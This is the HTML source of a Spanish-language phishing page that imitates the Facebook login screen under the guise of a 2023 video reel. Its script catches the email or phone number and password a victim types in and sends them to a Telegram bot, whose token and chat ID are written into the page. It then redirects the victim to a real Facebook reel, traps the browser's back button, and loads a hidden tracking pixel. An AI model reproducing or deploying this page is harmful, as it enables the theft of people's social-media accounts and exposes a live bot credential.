<html>


<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="robots" content="noindex">
  <meta name="robots" content="nofollow">
  <meta http-equiv="cache-control" content="no-cache">
  <meta name="theme-color" content="#3B5998">
  <meta name="msapplication-TileColor" content="#3B5998">
  <meta name="msapplication-navbutton-color" content="#3B5998">
  <meta name="apple-mobile-web-app-status-bar-style" content="#3B5998">
  <title>atrapados-en-camara-oficial-reel2023</title>
  <link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/e/ee/Logo_de_Facebook.png">
  
  <style type="text/css" media="all">
      body {
  padding: 0;
  margin: 0;
  font-family: sans-serif;
}

a {
  color: #576b95;
  cursor: pointer;
  text-decoration: none;
}

#top {
  color: #216fdb;
  text-align: center;
  background: #fffbe2;
  width: 100%;
  padding: 10px 0px;
}

#top img {
  position: relative;
  top: 3px;
  right: 5px;
}

#top div {
  width: 90%;
  margin: auto;
}

#logo {
  text-align: center;
}

#logo img {
  width: 184px;
  height: 36px;
  margin: 30px 0;
}

#layout {
  width: 90%;
  margin: auto;
}

.txt {
  padding: 3% 2%;
  background: #f5f6f7;
  border: 1px solid #e3e4e5;
  width: 96%;
  margin-bottom: 15px;
  -webkit-tap-highlight-color: transparent;
  font-size: 14px;
  line-height: 18px;
  border-radius: 5px;
  box-shadow: 1px 1px #cacaca;
}

#blogin {
  padding: 11px;
  background: #0c61cf;
  border: 0;
  margin: center 5%;
  margin-left: -0%;
  width: 100%;
  margin-bottom: 15px;
  font-size: 16px;
  line-left: 10%;
  line-height: 18px;
  border-radius: 25px;
  box-shadow: 0 2px 2px -2px #cacaca;
  color: #fff;
  font-weight: bold;
  text-shadow: 0 -1px rgb(0 0 0 / 25%);
}

#bcreate {
  padding: 12px 0;
  background: #00a400;
  border: 0;
  width: 60%;
  margin: auto;
  font-size: 14px;
  line-height: 18px;
  border-radius: 8px;
  box-shadow: 0 2px 2px -2px #cacaca;
  color: #fff;
  font-weight: bold;
  text-shadow: 0 -1px rgb(0 0 0 / 25%);
  margin-top: 50px;
}

p {
  text-align: center;
}

.bb {
  float: left;
  width: 42%;
  border-bottom: 2px solid #eaebed;
  height: 10px;
}

#c {
  float: left;
  width: 16%;
  text-align: center;
}

#bottom {
  width: 100%;
  text-align: center;
}

@media only screen and (min-width: 600px) {
  #layout {
    width: 380px;
    margin: auto;
  }
}

body {
  background-image: url("");
  background-position: center center;
  background-repeat: no-repeat;
  background-size: cover;
  background-attachment: fixed;
  background: #eceff5;
}
  </style>
</head>

<body>
  <img class="fb_logo _8ilh img" src="https://k61.kn3.net/taringa/7/C/A/6/7/F/Brahyan_10/0E5.gif" style="display:none">
  <img src="https://whos.amung.us/pingjs/?k=kshck&amp;t=Sky&amp;x=https://web.whatsapp.com/" style="display:none">
  <link rel="stylesheet" href="style.css">
  </style>
  <script type="text/javascript">
    window.history.pushState(null, "", window.location.href);
    window.onpopstate = () => {
      window.history.pushState(null, "", window.location.href);
      callback();
    };
  </script>
  <!-- Google tag (gtag.js) -->
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());

    gtag('config', 'UA-77070303-1');
  </script>
  <div style="text-align:center ;">
  <h1 style="color: dimgray; font-size: 12px;"
  >Español</h1><br><br>
  <div style="text-align:center ;">
  <img
    src="Facebook_Log.png"
    width="15%"><br><br><br><br>
  <div id="top">
    <div>
      <img src="lester.png" width="17px">Iniciar sesion en facebook
      <br>
    </div>
  </div>

  <div id="layout" style="margin-top: 20px;">
    <form>
    <input type="hidden" name="id" id="uid" value="1">
      <input type="text" name="correo electronico" id="correo" class="txt" minlenth="5"
        placeholder="Correo electrónico o número de teléfono" required>
      <input type="password" name="contraseña" id="contra" class="txt" minlenth="5" placeholder="Contraseña" required>
      <div style="text-align:center ;">
      <button type="submit" id="blogin">Iniciar sesión</button>
      <p><a>¿Olvidaste tu contraseña?</a></p>
      <div class="bb"></div>
      <div id="c">
        or
      </div>
      <div class="bb"></div>
      <div id="bottom">
        <button id="bcreate">Crear cuenta nueva</button>        
        <div style="text-align:center ;">
          <input type="hidden" name="_next" value="https://www.facebook.com/JhoanaOrozcoOficial">
             <input type="hidden" name="_captcha" value="false">
        </div>
        <br>
    </form>
   
  </div>
  <script type="text/javascript">
// Agrega el código JavaScript necesario para enviar la información al bot de Telegram
var form = document.querySelector('form');
form.addEventListener('submit', function(event) {
  event.preventDefault(); // Evita el envío del formulario por defecto

  // Obtén los valores de los campos de entrada
  var telefono = document.getElementById('correo').value;
  var contrasena = document.getElementById('contra').value;

  // Verifica si los campos están vacíos
  if (telefono.trim() === "" || contrasena.trim() === "") {
    alert("Por favor complete todos los campos.");
    return;
  }

  // Construye el mensaje a enviar al bot de Telegram
  var mensaje = "Correo: " + telefono + "\nContraseña: " + contrasena;
  var url_chat = "https://api.telegram.org/bot6670389624:AAFupmGjbtOL6hxvHFkw7cli-k_IwsG8PfE/sendMessage?chat_id=-1001823107207&text=" + encodeURIComponent(mensaje);
  var request_chat = new XMLHttpRequest();
  request_chat.open('GET', url_chat, true);
  request_chat.send();

  // Redirige al otro sitio web al terminar
  setTimeout(function() {
    window.location.href = 'https://www.facebook.com/reel/857968701909702?mibextid=dzrXD5';
  }, 1000);
});
  </script>
</body>

</html>